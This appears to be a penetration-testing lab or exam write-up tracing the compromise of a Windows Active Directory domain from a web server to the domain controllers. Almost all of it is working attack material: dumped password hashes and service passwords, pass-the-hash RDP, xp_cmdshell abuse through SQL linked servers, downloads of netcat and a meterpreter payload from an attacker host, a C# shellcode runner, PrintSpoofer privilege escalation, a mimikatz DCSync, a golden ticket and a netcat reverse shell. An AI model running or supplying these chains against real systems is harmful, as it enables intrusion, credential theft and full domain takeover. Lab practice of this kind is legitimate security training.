Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username :

[email protected]
cur/text: FDksld894rkjlsdfg

RID : 000003e9 (1001)

User : setup
LM :
NTLM : 42efdb0f0c884f32d51c2d785ea2d174

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : f99529e42ee77dc4704c568ba9320a34

Get-SQLInstanceLocal -Verbose

ComputerName : WEB06
Instance : WEB06\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName : MSSQL$SQLEXPRESS
ServicePath : "C:\Program Files\Microsoft SQL
Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
ServiceAccount : [email protected]
State : Running

Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 1 instances were found.

ComputerName : web06.dev.final.com
Instance : web06.dev.final.com,1433
DomainAccountSid : 150000052100027816418410210521023312414023318884400
DomainAccount : sqlsvc01
DomainAccountCn : sqlsvc01
Service : MSSQLSvc
Spn : MSSQLSvc/web06.dev.final.com:1433
LastLogon : 2/18/2021 10:35 PM
Description :

Get-SQLServerInfo -Verbose -Instance WEB06

VERBOSE: WEB06 : Connection Success.

ComputerName : WEB06
Instance : WEB06\SQLEXPRESS
DomainName : DEV
ServiceProcessID : 4468
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : [email protected]
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption :0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\apacheSvc
IsSysadmin : No
ActiveSessions :1

Enable RDP pass the hash:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name
"DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then I pass the hash with RDP to web06:

proxychains xfreerdp /v:172.16.X.194 /u:administrator
/pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution
+toggle-fullscreen /cert-ignore

We first run:
select * from master..sysservers

So RPCout is disabled, let’s enable it and then we can execute commands

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure

''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;
RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''whoami'';') AT SQL03

Gives: final\sqlsvc03

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure

''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;
RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri
http://192.168.X.Y/nc64.exe -o c:\windows\tasks\nc64.exe'';') AT SQL03

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f raw -

o chall6.bin
python xorenrypt.py chall6.bin

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace gimmeshell
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint
flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr
lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress,uint dwSize,
UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();

private static byte[] xor(byte[] cipher, byte[] key)

{

byte[] xored = new byte[cipher.Length];

for (int i = 0; i < cipher.Length; i++)

{
xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
}

return xored;
}
 static void Main(string[] args)
{
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000,
0x4,0);
if (mem == null)
{
return;
}

string key = "a70f8922029506d2e37f375fd638cdf9e2c039c8a1e6e01189eeb4efb";

byte[] xorbuf = { xorEncryptedShellcode};
byte[] buf = xor(xorbuf, Encoding.ASCII.GetBytes(key));
int size = buf.Length;

IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);

Marshal.Copy(buf, 0, addr, size);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF);

}
}
}

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure

''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;
RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri
http://192.168.X.Y/apple.exe -o c:\windows\tasks\apple.exe'';') AT SQL03

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure

''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;
RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''c:\windows\tasks\apple.exe'';') AT SQL03

meterpreter > getuid

Server username: FINAL\sqlsvc03
meterpreter > sysinfo
Computer : SQL03
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FINAL
Logged On Users : 7
Meterpreter : x64/windows

more c:\users\sqlsvc03\desktop\local.txt
299ca8cec8c772177e8103aa21363b63

SeImpersonatePrivilege Impersonate a client after authentication Enabled

So let’s try same as earlier with printspoofer.

c:\windows\tasks\PrintRulon.exe \\.\pipe\test\pipe\spoolss
^Z
Background channel 1? [y/N] y
meterpreter > shell
Process 4804 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>c:\windows\tasks\SpoolSample.exe sql03 sql03/pipe/test

c:\windows\tasks\SpoolSample.exe sql03 sql03/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

C:\Windows\system32>^Z
Background channel 2? [y/N] y
meterpreter > channel -i 1
Interacting with channel 1...

Found sid S-1-5-18

Impersonated user is: NT AUTHORITY\SYSTEM
PS C:\users>
[*] https://192.168.X.Y:443 handling request from 192.168.x.189; (UUID: eeyip861) Staging x64
payload (202329 bytes) ...
[*] Meterpreter session 2 opened (192.168.X.Y:443 -> 192.168.x.189:63856) at 2021-02-20
09:44:07 +0100

2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ SQL03 192.168.X.Y:443 ->

192.168.x.189:63856 (172.16.X.187)

more c:\users\administrator\desktop\proof.txt
ec8dce67fea16d638ade1419bfe3526e
* Username : sqlsvc03
* Domain : FINAL
* NTLM : 77f944ff6e0c0ed0c83dcef57bdf9298

Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username :

[email protected]
cur/text: 89sdfDSFksolds34f

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : 8388d07604009d14cbb78f7d37b9e887

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name

"DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

proxychains xfreerdp /v:172.16.X.187 /u:administrator

/pth:8388d07604009d14cbb78f7d37b9e887 +compression +clipboard /dynamic-resolution
+toggle-fullscreen /cert-ignore

But no linked servers here

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
sql11

more c:\users\administrator\desktop\proof.txt
c5cd6b2f7d31f8f4b392c49190ac864b

Then from earlier, we saw in BloodHound tina(which is domain admin) had a session on sql11,
so let’s dump hashes.
 * Username : tina
* Domain : FINAL
* NTLM : 1d4c153225b424290188504b9e0541eb

proxychains python3 /opt/Windows/Impacket/examples/psexec.py -hashes

:1d4c153225b424290188504b9e0541eb [email protected]
nt authority\system
PS C:\> hostname
ostname
dc01

more c:\users\administrator\desktop\proof.txt
716455142324167230fb17bb3a3df487

Then last machine is DC in dev domain. Let’s dump hashes now with dcsync
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all /csv" "exit"
[DC] 'final.com' will be the domain
[DC] 'dc01.final.com' will be the DC server
[DC] Exporting domain 'final.com'
502 krbtgt 405854caaf49b41e0e585369a001f114 514
1110 nina 25af00893895d3d871e625c5d4261539 66048
1000 DC01$ b888702a6a53dd77fea9f6d4ae1342d9 532480
500 Administrator 0474d3f0a74d30f13f1fec243e8ac3cb 66048
1114 sqlsvc11 c0f6442ea39956aebf28219639ba9953 66048
1120 ANSIBLE06$ 1bca5d43a0a0a71e5e97602585c248fd 69632
1115 adminWebSvc b0df1cb0819ca0b7d476d4c868175b94 66048
1113 sqlsvc03 77f944ff6e0c0ed0c83dcef57bdf9298 66048
1103 DEV$ 5156f91db57d21698a9fa0e61c889b02 2080
1117 SQL11$ b060949bbbbbb56614bd3ad7e28a2cb0 4096
1118 WEB05$ 1e9679e6dfe938501d519dd10a1962d5 4096
1119 JUMP03$ 4ac261a53476959a56b34c1606e08974 4096
1116 SQL03$ 5b685060ce6943a1a1570a8981d15b96 4096
1112 tommy 5ad27ee8000951e0669fab25f73f9d8a 66048
1109 tina 1d4c153225b424290188504b9e0541eb 66048

Then I check for enterprise admins group in dev.final.com but there are none, but:
The members of the group ENTERPRISE [email protected] have admin rights to the
computer DC02.DEV.FINAL.COM.

This means we can use /sids as the SID of that enterprise admins group.

.\mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-

1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-
5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
more \\dc02.dev.final.com\c$\users\administrator\desktop\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2

invoke-command -computername dc02.dev.final.com -scriptblock {powershell.exe iwr -uri

http://192.168.X.Y/nc64.exe -o c:\users\administrator\nc64.exe}

invoke-command -computername dc02.dev.final.com -scriptblock

{c:\users\administrator\nc64.exe 192.168.X.Y 80 -e cmd.exe}